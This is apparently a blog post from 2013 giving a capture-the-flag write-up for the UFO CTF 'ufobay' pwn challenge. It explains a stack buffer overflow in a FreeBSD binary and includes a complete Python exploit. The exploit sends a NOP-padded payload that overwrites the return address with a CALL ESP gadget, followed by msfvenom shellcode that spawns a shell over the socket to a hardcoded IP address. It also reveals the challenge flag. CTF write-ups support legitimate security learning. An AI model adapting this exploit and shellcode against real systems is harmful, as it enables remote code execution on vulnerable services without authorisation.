Monday, July 22, 2013

UFO CTF 2013 - pwn 100 - ufobay - [Team xbios]

The given binary is a 32 bit FreeBSD ELF executable, statically linked. Setting up a FreeBSD 9.1 VM, I started analysing the binary. Binary requires a user ufobay and database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where it gets parcel. User can supply 256 bytes of data. 172 bytes of data can overwrite the saved EIP.

Here is the idea of exploit:

[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget

Below is the exploit:
#!/usr/bin/env python

import struct
import socket
import time

# msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a'
shellcode = ( "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" +
              "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" +
              "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" +
              "\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" +
              "\x52\x51\x53\x50\xcd\x80")

ret_addr = struct.pack("<I", 0x080ff46d) # call esp
NOP = struct.pack("B", 0x90)
EBP = struct.pack("<I", 0x0815c080) 
payload = NOP * 168 + EBP + ret_addr + shellcode

ip = '92.63.96.226'
#ip = '192.168.122.200'
port = 1337

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
time.sleep(1)
print soc.recv(1024)

# option
soc.send("1\n")
time.sleep(0.5)
print soc.recv(512)

# source
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# destination
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# size
soc.send(str(len(payload)) + "\n")
time.sleep(0.5)
print soc.recv(512)

# parcel
soc.send(payload + "\n")
time.sleep(0.5)

soc.send("cat key\n")
time.sleep(0.5)
print soc.recv(1024)
Flag for the challenge is H0wCanW3D3F3atAL1ENZ

2 comments :

  1. Could you please to share the challenge file ?

    Thank you very much

    ReplyDelete